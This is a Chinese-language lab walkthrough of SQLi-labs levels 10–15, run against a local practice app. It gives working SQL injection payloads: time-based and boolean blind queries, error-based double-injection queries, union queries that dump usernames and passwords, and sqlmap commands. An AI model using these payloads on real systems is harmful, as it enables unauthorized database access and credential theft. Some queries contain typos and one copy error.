less-10 GET - Blind - Time based - double quotes (基於時間的雙引號盲注)
由於不管怎麼輸入都會被過濾,返回同一個結果,
所以只能用時間延遲注入
開始注入
?id=1''and sleep(3) --+
此時注入成功
開始爆庫
?id=1'’ and if(length(database())=4 , sleep(3), 1) --+
當?id=1’ and if(length(database())=8 , sleep(3), 1) --+時明顯延遲,所以庫名長爲8
當?id=1’ and if(left(database(),1)=‘s’ , sleep(3), 1) --+發現明顯延遲說明庫名第一個字符爲 ‘s’
繼續爆破?id=1’ and if(left(database(),8)=‘security’ , sleep(3), 1) --+,說明庫名爲 ‘security’
開始爆表
?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' , sleep(3), 1) --+
使用limit x,1 查詢第x個表名,和爆破庫名一樣,第一個表名爲referer。終於,在第三個表爆到users這個表,顯然是用戶信息表。
定向爆破password和username
慢慢爆,最後拿到結果的就是這兩個
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password', sleep(3), 1) --+
爆到password
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password', sleep(3), 1) --+
爆到username
Less-11 POST - Error Based - Single quotes- String (基於錯誤的POST型單引號字符型注入)
post提交的方法,用burpsuit抓包但是社區版就很慢
改代理,抓包,發送到repeater,在repeater中通過修改post的參數
Less-12 POST - Error Based - Double quotes- String-with twist (基於錯誤的雙引號POST型字符型變形的注入)
方法可以和第11題差不多吧
然後據說也可以用sqlmap
python sqlmap.py -r "http://localhost/sqli-labs-master/Less-12/" --technique E --dbms mysql --batch -v 0
和SQL注入
Less-13 POST - Double Injection - Single quotes- String -twist (POST單引號變形雙注入)
查庫,一個個改參數(limit n,1)
') or (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
查表,同樣一個個改參數(limit n,1)
') or (select 1 from (select count(*),concat((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
查內容,還是一個個改參數(limit n,1)
') or (select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#
Less-14 POST - Double Injection - Single quotes- String -twist (POST單引號變形雙注入)
我發現sqlmap來的最快而且方便
python sqlmap.py -r “http://localhost/sqli-labs-master/Less-14/” --technique E --dbms mysql --batch -v 0
less-15 POST - Blind- Boolian/time Based - Single quotes (基於bool型/時間延遲單引號POST型盲注)
加單引號就報錯,盲注,用' or 1=1 or '1'='2和’)閉合,顯示登陸成功
開始布爾型盲注:構造' or 1=(if(substr(version(),1,1)=5,1,0)) or '1'='2
顯示登錄成功,所以說明1=(if(substr(version(),1,1)=5,1,0))爲true
都是把構造好的語句替換1=1
開始聯合注入,爆庫,爆表,爆列,字段和用戶名、密碼
?id=-1' union select 1,group_concat(schema_name),1 from information_schema.schemata --+
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
?id=-1' union select 1,group_concat(concat_ws(':',username,password)),3 from users --+